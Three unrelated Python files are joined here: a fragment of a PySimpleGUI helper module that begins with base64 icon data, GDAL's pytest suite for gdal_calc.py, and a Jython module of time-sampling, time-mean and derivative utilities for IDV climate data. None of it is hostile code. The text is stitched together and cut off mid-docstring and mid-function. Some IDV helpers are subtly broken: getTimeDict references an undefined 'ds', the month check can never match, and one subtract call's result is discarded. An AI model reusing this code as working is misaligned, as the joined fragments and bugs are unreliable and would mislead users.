b'PqHuvgXxvyCFFx4DAJHVkXNLlu5KdJSpxkQ1TTIAfI5BTJ10AXqWWADArOMye1WyPtGRBcGt8EDs'
b'Xpjt9sUibZMuQFW1EAB8GQqdmX/29IrJKvAwxPdAQJW8ACByXA4mdklplA7OBz3DTXiwxQU0+P0f'
b'hFRFKTSbc3YXz9s2XsCPnE5Hginok2J+AEg3JGVMVEBc8es3bpwtMifvrk1L//WmzKwdRcnJ87ul'
b'aH0wKvWaBcFoYdkcm45f1Kco0qLOzpIROWifojQDcCy3pTx/cvFiK1XB+mWJ1DVeeOE7CwCAusYL'
b'<KEY>2+<KEY>'
b'AKANvrpGYcz1OASyOSu3rNBizhR0hO+OSIFzAd/Nw/fvt4zXyYL0dNEtCGWzTKbUuwNR3/ve5k9a'
b'h55wNU6nId9sLgmoasc/bt++OTLu/zboYU40Aq2CAAAAAElFTkSuQmCC'
)
class WindowCloseError(Exception):
"""Custom exception to allow exiting a GUI window to stop the program."""
def safely_close_window(window):
"""
Closes a PySimpleGUI window and removes the window and its layout.
Used when exiting a window early by manually closing the window. Ensures
that the window is properly closed and then raises a
WindowCloseError exception, which can be used to determine that the window
was manually closed.
Parameters
----------
window : sg.Window
The window that will be closed.
Raises
------
WindowCloseError
Custom exception to notify that the window has been closed earlier
than expected.
"""
window.close()
raise WindowCloseError('Window was closed earlier than expected.')
def doc_lru_cache(function=None, **lru_cache_kwargs):
"""
Decorator that allows keeping a function's docstring when using functools.lru_cache.
Parameters
----------
function : Callable
The function to use. If used as a decorator and lru_cache_kwargs
are specified, then function will be None.
**lru_cache_kwargs
Any keyword arguments to pass to functools.lru_cache (maxsize and/or typed,
as of Python 3.9).
Examples
--------
A basic usage of this decorator would look like:
>>> @doc_lru_cache(maxsize=200)
def function(arg, kwarg=1)
return arg + kwarg
"""
if function is None:
function = functools.partial(doc_lru_cache, **lru_cache_kwargs)
@functools.lru_cache(**lru_cache_kwargs)
def wrapper(*args, **kwargs):
return function(*args, **kwargs)
return functools.update_wrapper(wrapper, function)
def set_dpi_awareness(awareness_level=1):
"""
Sets DPI awareness for Windows operating system so that GUIs are not blurry.
Fixes blurry tkinter GUIs due to weird dpi scaling in Windows os. Other
operating systems are ignored.
Parameters
----------
awareness_level : {1, 0, 2}
The dpi awareness level to set. 0 turns off dpi awareness, 1 sets dpi
awareness to scale with the system dpi and automatically changes when
the system dpi changes, and 2 sets dpi awareness per monitor and does
not change when system dpi changes. Default is 1.
Raises
------
ValueError
Raised if awareness_level is not 0, 1, or 2.
Notes
-----
Will only work on Windows 8.1 or Windows 10. Not sure if earlier versions
of Windows have this issue anyway.
"""
# 'nt' designates Windows operating system
if os.name == 'nt' and ctypes is not None:
if awareness_level not in (0, 1, 2):
raise ValueError('Awareness level must be either 0, 1, or 2.')
try:
ctypes.oledll.shcore.SetProcessDpiAwareness(awareness_level)
except (AttributeError, OSError, PermissionError):
# AttributeError is raised if the dll loader was not created, OSError
# is raised if setting the dpi awareness errors, and PermissionError is
# raised if the dpi awareness was already set, since it can only be set
# once per thread. All are ignored.
pass
@doc_lru_cache()
def check_availability(module):
"""
Checks whether an optional dependency is available to import.
Does not check the module version since it is assumed that the
parent module will do a version check if the module is actually
usable.
Parameters
----------
module : str
The name of the module.
Returns
-------
bool
True if the module can be imported, False if it cannot.
Notes
-----
It is faster to use importlib to check the availability of the
module rather than doing a try-except block to try and import
the module, since importlib does not actually import the module.
"""
return importlib.util.find_spec(module) is not None
@doc_lru_cache(maxsize=None)
def excel_column_name(index):
"""
Converts 1-based index to the Excel column name.
Parameters
----------
index : int
The column number. Must be 1-based, ie. the first column
number is 1 rather than 0.
Returns
-------
col_name : str
The column name for the input index, eg. an index of 1 returns 'A'.
Raises
------
ValueError
Raised if the input index is not in the range 1 <= index <= 18278,
meaning the column name is not within 'A'...'ZZZ'.
Notes
-----
Caches the result so that any repeated index lookups are faster,
and uses recursion to make better usage of the cache.
chr(64 + remainder) converts the remainder to a character, where
64 denotes ord('A') - 1, so if remainder = 1, chr(65) = 'A'.
"""
if not 1 <= index <= 18278: # ensures column is between 'A' and 'ZZZ'.
raise ValueError(f'Column index {index} must be between 1 and 18278.')
col_num, remainder = divmod(index, 26)
# ensure remainder is between 1 and 26
if remainder == 0:
remainder = 26
col_num -= 1
if col_num > 0:
return excel_column_name(col_num) + chr(64 + remainder)
else:
return chr(64 + remainder)
def get_min_size(default_size, scale, dimension='both'):
"""
Returns the minimum size for a GUI element to match the screen size.
Parameters
----------
default_size : int
The default number of pixels to use. Needed because sg.Window.get_screen_size()
can return the total screen size when using multiple screens on some linux
systems.
scale : float
The scale factor to apply to the screen size as reported by
sg.Window.get_screen_size. For example, if the element size was
desired to be at most 50% of the minimum screen dimension, then
the scale factor is 0.5.
dimension : str
The screen dimension to compare. Can be either 'width', 'height', or 'both'.
Returns
-------
int
The minimum pixel count among scale * screen height, scale * screen width,
and default_size.
"""
indices = {'width': [0], 'height': [1], 'both': [0, 1]}
screen_size = sg.Window.get_screen_size()
return int(min(*(scale * screen_size[index] for index in indices[dimension]), default_size))
def string_to_unicode(input_list):
r"""
Converts strings to unicode by replacing ``'\\'`` with ``'\'``.
Necessary because user input from text elements in GUIs are raw strings and
will convert any ``'\'`` input by the user to ``'\\'``, which will not
be converted to the desired unicode. If the string already has unicode
characters, it will be left alone.
Also converts things like ``'\\n'`` and ``'\\t'`` to ``'\n'`` and ``'\t'``,
respectively, so that inputs are correctly interpreted.
Parameters
----------
input_list : (list, tuple) or str
A container of strings or a single string.
Returns
-------
output : (list, tuple) or str
A container of strings or a single string, depending on the input,
with the unicode correctly converted.
Notes
-----
Uses raw_unicode_escape encoding to ensure that any existing unicode is
correctly decoded; otherwise, it would translate incorrectly.
If using mathtext in matplotlib and want to do something like ``$\nu$``,
input ``$\\nu$`` in the GUI, which gets converted to ``$\\\\nu$`` by the GUI,
and in turn will be converted back to ``$\\nu$`` by this fuction, which
matplotlib considers equivalent to ``$\nu$``.
"""
if isinstance(input_list, str):
input_list = [input_list]
return_list = False
else:
return_list = True
output = []
for entry in input_list:
if '\\' in entry:
entry = entry.encode('raw_unicode_escape').decode('unicode_escape')
output.append(entry)
return output if return_list else output[0]
def stringify_backslash(input_string):
r"""
Fixes strings containing backslash, such as ``'\n'``, so that they display properly in GUIs.
Parameters
----------
input_string : str
The string that potentially contains a backslash character.
Returns
-------
output_string : str
The string after replacing various backslash characters with their
double backslash versions.
Notes
-----
It is necessary to replace multiple characters because things like ``'\n'`` are
considered unique characters, so simply replacing the ``'\'`` would not work.
"""
output_string = input_string
replacements = (('\\', '\\\\'), ('\n', '\\n'), ('\t', '\\t'), ('\r', '\\r'))
for replacement in replacements:
output_string = output_string.replace(*replacement)
return output_string
def validate_inputs(window_values, integers=None, floats=None,
strings=None, user_inputs=None, constraints=None):
"""
Validates entries from a PySimpleGUI | |
<reponame>nicoguillier/gdal<filename>autotest/pyscripts/test_gdal_calc.py
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id: test_gdal_calc.py 25549 2013-01-26 11:17:10Z rouault $
#
# Project: GDAL/OGR Test Suite
# Purpose: gdal_calc.py testing
# Author: <NAME> <etourigny dot dev @ gmail dot com>
#
###############################################################################
# Copyright (c) 2013, <NAME> <<EMAIL>>
# Copyright (c) 2014, <NAME> <etourigny dot dev @ <EMAIL> dot <EMAIL>>
# Copyright (c) 2020, <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import shutil
from copy import copy
from osgeo import gdal
import test_py_scripts
import pytest
from collections import defaultdict
# test that numpy is available, if not skip all tests
try:
import numpy as np
from osgeo.utils import gdal_calc
from osgeo.gdal_array import GDALTypeCodeToNumericTypeCode
numpy_available = True
except (ImportError, AttributeError):
numpy_available = False
# Usage: gdal_calc.py [-A <filename>] [--A_band] [-B...-Z filename] [other_options]
def check_file(filename_or_ds, checksum, i=None, bnd_idx=1):
if gdal_calc.is_path_like(filename_or_ds):
ds = gdal.Open(filename_or_ds)
else:
ds = filename_or_ds
assert ds is not None, 'ds{} not found'.format(i if i is not None else '')
ds_checksum = ds.GetRasterBand(bnd_idx).Checksum()
if checksum is None:
print('ds{} bnd{} checksum is {}'.format(i, bnd_idx, ds_checksum))
else:
assert ds_checksum == checksum, 'ds{} bnd{} wrong checksum, expected {}, got {}'.format(i, bnd_idx, checksum, ds_checksum)
return ds
temp_counter_dict = defaultdict(int)
opts_counter_counter = 0
input_checksum = (12603, 58561, 36064, 10807)
def get_input_file():
infile = make_temp_filename(0)
if not os.path.isfile(infile):
shutil.copy('../gcore/data/stefan_full_rgba.tif', infile)
return infile
def format_temp_filename(test_id, idx, is_opt=False):
if not is_opt:
out_template = 'tmp/test_gdal_calc_py{}.tif'
return out_template.format('' if test_id == 0 else '_{}_{}'.format(test_id, idx))
else:
opts_template = 'tmp/opt{}'
return opts_template.format(idx)
def make_temp_filename(test_id, is_opt=False):
if not is_opt:
global temp_counter_dict
temp_counter_dict[test_id] = 1 + (temp_counter_dict[test_id] if test_id else 0)
idx = temp_counter_dict[test_id]
else:
global opts_counter_counter
opts_counter_counter = opts_counter_counter + 1
idx = opts_counter_counter
return format_temp_filename(test_id, idx, is_opt)
def make_temp_filename_list(test_id, test_count, is_opt=False):
return list(make_temp_filename(test_id, is_opt) for _ in range(test_count))
def test_gdal_calc_py_1():
""" test basic copy """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 1, 3
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-Z {} --Z_band=2 --calc=Z --overwrite --outfile {}'.format(infile, out[2]))
for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
check_file(out[i], checksum, i+1)
def test_gdal_calc_py_2():
""" test simple formulas """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 2, 3
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 -B {} --B_band 2 --calc=A+B --overwrite --outfile {}'.format(infile, infile, out[0]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 -B {} --B_band 2 --calc=A*B --overwrite --outfile {}'.format(infile, infile, out[1]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 --calc="sqrt(A)" --type=Float32 --overwrite --outfile {}'.format(infile, out[2]))
for i, checksum in zip(range(test_count), (12368, 62785, 47132)):
check_file(out[i], checksum, i+1)
#
def test_gdal_calc_py_3():
""" test --allBands option (simple copy) """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 3, 1
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --allBands A --calc=A --overwrite --outfile {}'.format(infile, out[0]))
bnd_count = 4
for i, checksum in zip(range(bnd_count), input_checksum[0:bnd_count]):
check_file(out[0], checksum, 1, bnd_idx=i+1)
def test_gdal_calc_py_4():
""" test --allBands option (simple calc) """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 4, 3
out = make_temp_filename_list(test_id, test_count)
# some values are clipped to 255, but this doesn't matter... small values were visually checked
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=1 --overwrite --outfile {}'.format(infile, out[0]))
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A+B --NoDataValue=999 --overwrite --outfile {}'.format(infile, out[0], out[1]))
bnd_count = 3
for i, checksum in zip(range(bnd_count), (29935, 13128, 59092)):
check_file(out[1], checksum, 2, bnd_idx=i+1)
# these values were not tested
test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A*B --NoDataValue=999 --overwrite --outfile {}'.format(infile, infile, out[2]))
bnd_count = 3
for i, checksum in zip(range(bnd_count), (10025, 62785, 10621)):
check_file(out[2], checksum, 3, bnd_idx=i+1)
def test_gdal_calc_py_5():
""" test python interface, basic copy """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 5, 4
out = make_temp_filename_list(test_id, test_count)
gdal_calc.Calc('A', A=infile, overwrite=True, quiet=True, outfile=out[0])
gdal_calc.Calc('A', A=infile, A_band=2, overwrite=True, quiet=True, outfile=out[1])
gdal_calc.Calc('Z', Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[2])
gdal_calc.Calc(['A', 'Z'], A=infile, Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[3])
for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
check_file(out[i], checksum, i+1)
bnd_count = 2
for i, checksum in zip(range(bnd_count), (input_checksum[0], input_checksum[1])):
check_file(out[3], checksum, 4, bnd_idx=i+1)
def test_gdal_calc_py_6():
""" test nodata """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
test_id, test_count = 6, 2
out = make_temp_filename_list(test_id, test_count)
gdal.Translate(out[0], '../gcore/data/byte.tif', options='-a_nodata 74')
gdal_calc.Calc('A', A=out[0], overwrite=True, quiet=True, outfile=out[1], NoDataValue=1)
for i, checksum in zip(range(test_count), (4672, 4673)):
ds = check_file(out[i], checksum, i+1)
if i == 1:
result = ds.GetRasterBand(1).ComputeRasterMinMax()
assert result == (90, 255), 'Error! min/max not correct!'
ds = None
def test_gdal_calc_py_7():
""" test --optfile """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 7, 4
out = make_temp_filename_list(test_id, test_count)
opt_files = make_temp_filename_list(test_id, test_count, is_opt=True)
with open(opt_files[0], 'w') as f:
f.write('-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
# Lines in optfiles beginning with '#' should be ignored
with open(opt_files[1], 'w') as f:
f.write('-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
f.write('\n# -A_band=1')
# options on separate lines should work, too
opts = '-Z {}'.format(infile), '--Z_band=2', '--calc=Z', '--overwrite', '--outfile {}'.format(out[2])
with open(opt_files[2], 'w') as f:
for i in opts:
f.write(i + '\n')
# double-quoted options should be read as single arguments. Mixed numbers of arguments per line should work.
opts = '-Z {} --Z_band=2'.format(infile), '--calc "Z + 0"', '--overwrite --outfile {}'.format(out[3])
with open(opt_files[3], 'w') as f:
for i in opts:
f.write(i + '\n')
for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1], input_checksum[1])):
test_py_scripts.run_py_script(script_path, 'gdal_calc', '--optfile {}'.format(opt_files[i]))
check_file(out[i], checksum, i+1)
def test_gdal_calc_py_8():
""" test multiple calcs """
if not numpy_available:
pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
script_path = test_py_scripts.get_py_script('gdal_calc')
if script_path is None:
pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
infile = get_input_file()
test_id, test_count = 8, 1
out = make_temp_filename_list(test_id, test_count)
test_py_scripts.run_py_script(
script_path, 'gdal_calc',
'-A {} --A_band=1 -B {} --B_band=2 -Z {} --Z_band=2 --calc=A --calc=B --calc=Z --overwrite --outfile {}'.
format(infile, infile, infile, out[0]))
bnd_count = 3
for i, checksum in zip(range(bnd_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
check_file(out[0], checksum, 1, bnd_idx=i+1)
def my_sum(a, gdal_dt=None):
""" sum using numpy """
np_dt = GDALTypeCodeToNumericTypeCode(gdal_dt)
concatenate = np.stack(a)
ret = concatenate.sum(axis=0, dtype=np_dt)
return ret
def my_max(a):
""" max using numpy """
concatenate = np.stack(a)
ret = concatenate.max(axis=0)
return ret
def test_gdal_calc_py_9():
"""
test calculating sum in different ways. testing the following features:
* | |
from visad.python.JPythonMethods import *
# A collection of Utilities for Mapes IDV Collection
#Author: <NAME>, <EMAIL>
############################TIME UTILS############################################
def getSamplesAtTimes(grid,year=None,season=None,mon=None,day=None,hour=None,min=None,sec=None,ms=None):
""" Samples a grid at specified time periods, multiple arguments can be used in complex sampling
eg.., using hour = 5 would return all samples corresponding to 5 am, further specifing year = 2008
would give samples at 5am in year 2008
"""
from visad import RealType
from visad import Gridded1DDoubleSet
from visad import FieldImpl
from visad import FunctionType
from visad import VisADException
if (str(mon)!="None" and str(season)!="None"):
raise VisADException("One of Month or Season can be used, not both")
timeSet=GridUtil.getTimeSet(grid)
indices=getSampleTimeIndices(grid,year,season,mon,day,hour,min,sec,ms)
timevals=timeSet.getSamples()[0]
subsetTimeValues=[timevals[i] for i in indices]
newTimes=Gridded1DDoubleSet(RealType.Time,[subsetTimeValues],len(subsetTimeValues),None,timeSet.getSetUnits(),None)
subsetgrid = FieldImpl(FunctionType(RealType.Time, grid.getSample(0).getType()), newTimes)
for i in range(len(subsetTimeValues)):
subsetgrid.setSample(i,grid[indices[i]])
return subsetgrid
def getSampleTimeIndices(grid,year=None,season=None,mon=None,day=None,hour=None,min=None,sec=None,ms=None):
""" A Helper function to get indices a grid at specified time periods, multiple arguments can be used in
complex sampling. This function returns list of indices in grid.
"""
from visad import VisADException
searchformat=""
searchstring=""
if (str(mon)!="None" and str(season)!="None"):
raise VisADException("One of Month or Season can be used, not both")
if (str(year)!="None" and len(str(year))==4):
searchformat=searchformat+"yyyy"
searchstring=searchstring+str(year)
if (str(mon)!="None" and int(mon) in ([range(1,13)]) and len(str(mon))<=2):
searchformat=searchformat+"MM"
if (len(str(mon))<2):
searchstring=searchstring+"0"+str(mon)
else:
searchstring=searchstring+str(mon)
if (str(day)!="None"):
searchformat=searchformat+"dd"
searchstring=searchstring+str(day)
if (str(hour)!="None"):
searchformat=searchformat+"HH"
searchstring=searchstring+str(hour)
if (str(min)!="None"):
searchformat=searchformat+"mm"
searchstring=searchstring+str(min)
if (str(sec)!="None"):
searchformat=searchformat+"ss"
searchstring=searchstring+str(sec)
if (str(ms)!="None"):
searchformat=searchformat+"ms"
searchstring=searchstring+str(ms)
if (str(season)!="None"):
seasons=("djf","jfm","mam","jja","son","ond","jjas")
seasmons=((12,1,2),(1,2,3),(3,4,5),(6,7,8),(9,10,11),(10,11,12),(6,7,8,9))
if (str(season).lower() in seasons):
montimes=getSampleTimesInFormat(grid,"MM")
alltimes=getSampleTimesInFormat(grid,searchformat.strip())
seasonlist=[list(seasons)]
seasonsearch=seasmons[list(seasons).index(str(season).lower())]
matchindices=[i for i,t,m in zip(range(len(alltimes)),alltimes,montimes) if t==searchstring and int(m) in seasonsearch]
else:
raise VisADException("Season "+str(season)+" not found")
else:
alltimes=getSampleTimesInFormat(grid,searchformat.strip())
matchindices=[i for i,t in enumerate(alltimes) if t==searchstring]
return matchindices
def getSampleTimesInFormat(grid,timeformat,timezone="UTC",outformat="string"):
""" A Helper function to return times of a grid in specified format as a list.
"""
from ucar.visad.data import CalendarDateTime
from visad import DateTime
from ucar.visad.UtcDate import formatUtcDate
from visad import VisADException
from java.util import TimeZone
dateTimes = CalendarDateTime.timeSetToArray(GridUtil.getTimeSet(grid))
TIMEZONE=TimeZone.getTimeZone(timezone)
temp=[]
for i in range(grid.getDomainSet().getLength()):
if (str(outformat).lower() in ("string","str")):
temp.append(str(dateTimes[i].formattedString(timeformat,TIMEZONE)))
elif (str(outformat).lower() in ("float","flt")):
temp.append(float(dateTimes[i].formattedString(timeformat,TIMEZONE)))
elif (str(outformat).lower() in ("int","integer")):
temp.append(Integer(dateTimes[i].formattedString(timeformat,TIMEZONE)))
else:
raise VisADException("Unrecognized output format")
return temp
def createTimeMeans(grid,meanType="None"):
""" Create time mean of a grid at periods specified by type.
meanType can be yearly, monthly, daily, hourly, minutes, seconds
"""
from visad import Real
from visad import Gridded1DDoubleSet
from visad import FieldImpl
from visad import FunctionType
from visad import RealType
from visad import VisADException
if (str(meanType).lower() in ("year","yr","years","yearly")):
searchFormat="yyyy"
elif (str(meanType).lower() in ("mon","month","months","monthly")):
searchFormat="MM"
elif (str(meanType).lower() in ("day","d","days","daily")):
searchFormat="dd"
elif (str(meanType).lower() in ("hr","hour","hours","hourly")):
searchFormat="hh"
elif (str(meanType).lower() in ("m","min","minute","minutes","minutely")):
searchFormat="mm"
elif (str(meanType).lower() in ("s","sec","second","seconds")):
searchFormat="ss"
else:
raise VisADException("Unrecognized time mean type, use yearly or monthly etc")
alltimes=getSampleTimesInFormat(grid,searchFormat)
timeSet=GridUtil.getTimeSet(grid)
timeset=GridUtil.getTimeSet(grid).getSamples()[0]
timevalues=[i for i in timeset]
oldtime=alltimes[0]
temptime=0
count=0
newtimelist=[]
for currt,tv,i in zip(alltimes,timevalues,range(len(alltimes))):
#values are always accumulated next time
if currt==oldtime:
#takes care of multiple times,first time,last time
temptime=temptime+tv
count=count+1
if(i==(len(alltimes)-1)):
newtimeval=temptime/count
newtimelist.append(newtimeval)
else:
#prev values are accumulated join to list
newtimeval=temptime/count
newtimelist.append(newtimeval)
count=1
temptime=tv
oldtime=currt
if(i==(len(alltimes)-1)):
newtimelist.append(temptime)
#create new time set
newTimes=Gridded1DDoubleSet(RealType.Time,[newtimelist],len(newtimelist),None,timeSet.getSetUnits(),None)
newdatalist=FieldImpl(FunctionType(RealType.Time, grid.getSample(0).getType()), newTimes)
timindices=range(len(newtimelist))
oldtime=alltimes[0]
tempdata=grid.getSample(0).multiply(Real(0.0))
count=0
newind=0
for currt,i in zip(alltimes,range(len(alltimes))):
#values are always accumulated next time
if currt==oldtime:
#takes care of multiple times,first time,last time
tempdata=tempdata.add(grid.getSample(i))
count=count+1
if(i==(len(alltimes)-1)):
newdatalist.setSample(newind,tempdata.divide(Real(count)))
newind=newind+1
else:
#prev values are accumulated join to list
newdatalist.setSample(newind,tempdata.divide(Real(count)))
newind=newind+1
count=1
tempdata=grid.getSample(i)
oldtime=currt
if(i==(len(alltimes)-1)):
newdatalist.setSample(newind,tempdata.divide(Real(count)))
newParamName="Time Mean "+str(Util.cleanTypeName(GridUtil.getParamType(grid)))
return newName(newdatalist,newParamName)
def ddt(grid,timegradunit):
""" compute tendency (time derivative) using forward difference,
units of returned grid are units of grid per timegradient unit
timegradient unit can be month, day, hour, minute, seconds
"""
from visad import Real
from visad import FunctionType
from visad import FieldImpl
from visad import RealType
from visad import Gridded1DDoubleSet
from ucar.visad.data import CalendarDateTime
from visad import CommonUnit
from visad import VisADException
if (GridUtil.isTimeSequence(grid)==1):
newTimeValues= []
timediffs=[]
ts = GridUtil.getTimeSet(grid)
if (str(timegradunit).lower() in ("mon","month","months")):
timefactor=86400.0*30
timegradunit="month"
elif (str(timegradunit).lower() in ("day","d","days")):
timefactor=86400.0
timegradunit="day"
elif (str(timegradunit).lower() in ("hr","hour","hours")):
timefactor=3600.0
timegradunit="hr"
elif (str(timegradunit).lower() in ("m","min","minute","minutes")):
timefactor=60.0
timegradunit="min"
elif (str(timegradunit).lower() in ("s","sec","second","seconds")):
timefactor=1.0
timegradunit="s"
else:
raise VisADException("Requested time gradient unit is ambigious,use month,day,hour etc")
for i in range(grid.getDomainSet().getLength()-1):
newTimeValues.append((ts[i].getValue()+ts[i+1].getValue())/2)
prevtime=float(ts[i].getValue(CommonUnit.secondsSinceTheEpoch))
nexttime=float(ts[i+1].getValue(CommonUnit.secondsSinceTheEpoch))
timediffs.append((nexttime-prevtime)/timefactor)
newTimes=Gridded1DDoubleSet(RealType.Time,[newTimeValues],len(newTimeValues),None,ts.getSetUnits(),None)
ddtgrid = FieldImpl(FunctionType(RealType.Time, grid.getSample(0).getType()), newTimes)
for i in range(grid.getDomainSet().getLength()-1):
diff=(grid.getSample(i+1)-grid.getSample(i)).divide(Real(timediffs[i]))
ddtgrid.setSample(i,diff)
unitname=str(GridUtil.getParamType(grid).getComponent(0).getDefaultUnit())
print("["+unitname+"]/"+str(timegradunit))
newunit = Util.parseUnit("("+unitname+")/"+str(timegradunit))
newType = Util.makeRealType("ddt of "+getVarName(grid), newunit)
else:
raise VisADException("Well, this data is not a time series, hard to do a time derivative!")
return GridUtil.setParamType(ddtgrid,newType,0)
def anomalyFromTimeMeans(grid,meanType="None"):
""" Returns deviation from time means, timemean can be monthly, daily etc..
eg.., meanType="day" will return deviation of each step from its
corresponding daily mean.
"""
from visad import Real
from visad import Gridded1DDoubleSet
from visad import FieldImpl
from visad import FunctionType
from visad import RealType
from visad.Data import NEAREST_NEIGHBOR
from visad.Data import NO_ERRORS
from visad import VisADException
timeMean=createTimeMeans(grid,meanType)
grid.subtract(timeMean)
if (str(meanType).lower() in ("mon","month","months","montly")):
searchFormat="MM"
elif (str(meanType).lower() in ("day","d","days","daily")):
searchFormat="dd"
elif (str(meanType).lower() in ("hr","hour","hours","hourly")):
searchFormat="hh"
elif (str(meanType).lower() in ("m","min","minute","minutes","minutely")):
searchFormat="mm"
elif (str(meanType).lower() in ("s","sec","second","seconds")):
searchFormat="ss"
else:
raise VisADException("Unrecognized time mean type, use yearly or monthly etc")
return grid.subtract(timeMean,NEAREST_NEIGHBOR,NO_ERRORS)
def getTimeDict(grid):
""" A helper function to return timestamps of grid as dictionary of years, months etc.
"""
from ucar.visad.data import CalendarDateTime
from visad import DateTime
from ucar.visad.UtcDate import formatUtcDate
if (GridUtil.isTimeSequence(grid)==1):
dateTimes = CalendarDateTime.timeSetToArray(grid.getDomainSet())
YYYY=[]
MM=[]
dd=[]
DD=[]
mm=[]
hh=[]
ss=[]
YYYYMMdd=[]
HHmmss=[]
for i in range(ds.getDomainSet().getLength()):
print formatUtcDate(dateTimes[i],"DD",DateTime.DEFAULT_TIMEZONE)
YYYY.append(str(dateTimes[i].formattedString("yyyy",DateTime.DEFAULT_TIMEZONE)))
MM.append(str(dateTimes[i].formattedString("MM",DateTime.DEFAULT_TIMEZONE)))
dd.append(str(dateTimes[i].formattedString("dd",DateTime.DEFAULT_TIMEZONE)))
DD.append(str(dateTimes[i].formattedString("DD",DateTime.DEFAULT_TIMEZONE)))
hh.append(str(dateTimes[i].formattedString("HH",DateTime.DEFAULT_TIMEZONE)))
mm.append(str(dateTimes[i].formattedString("mm",DateTime.DEFAULT_TIMEZONE)))
ss.append(str(dateTimes[i].formattedString("ss",DateTime.DEFAULT_TIMEZONE)))
YYYYMMdd.append(str(dateTimes[i].formattedString("YYYYMMdd",DateTime.DEFAULT_TIMEZONE)))
HHmmss.append(str(dateTimes[i].formattedString("HHmmss",DateTime.DEFAULT_TIMEZONE)))
timeDict=dict([('YYYYMMdd',YYYYMMdd),('HHmmss',HHmmss),('YYYY', YYYY),('MM',MM),('dd',dd),('DD',DD),('mm',mm),('ss',ss)])
else:
raise VisADException("This grid is not a time sequence")
return timeDict
def setValuestoGridAverage(variable,avgvariable):
""" Set all values at each grid in a grid by spatial average,
currently the average is not area weighted
"""
from ucar.unidata.util.Misc import getAverage
ts=GridUtil.getTimeSet(variable)
newGrid=variable.clone()
for i in range(ts.getLength()):
avg=getAverage(avgvariable.getSample(i).getFloats()[0])
newGrid.setSample(i,replace(variable.getSample(i),avg))
return newGrid
def correlationwith1d(variable,variable1d):
""" Computes time correlation at each grid point with 1d variable supplied.
"""
yvar=setValuestoGridAverage(variable,variable1d)
corr1d=correlation(variable,yvar)
return corr1d
def correlation(xvar,yvar):
""" Computes time correlation at each grid point in xvar with corresponding grid
in yvar.
"""
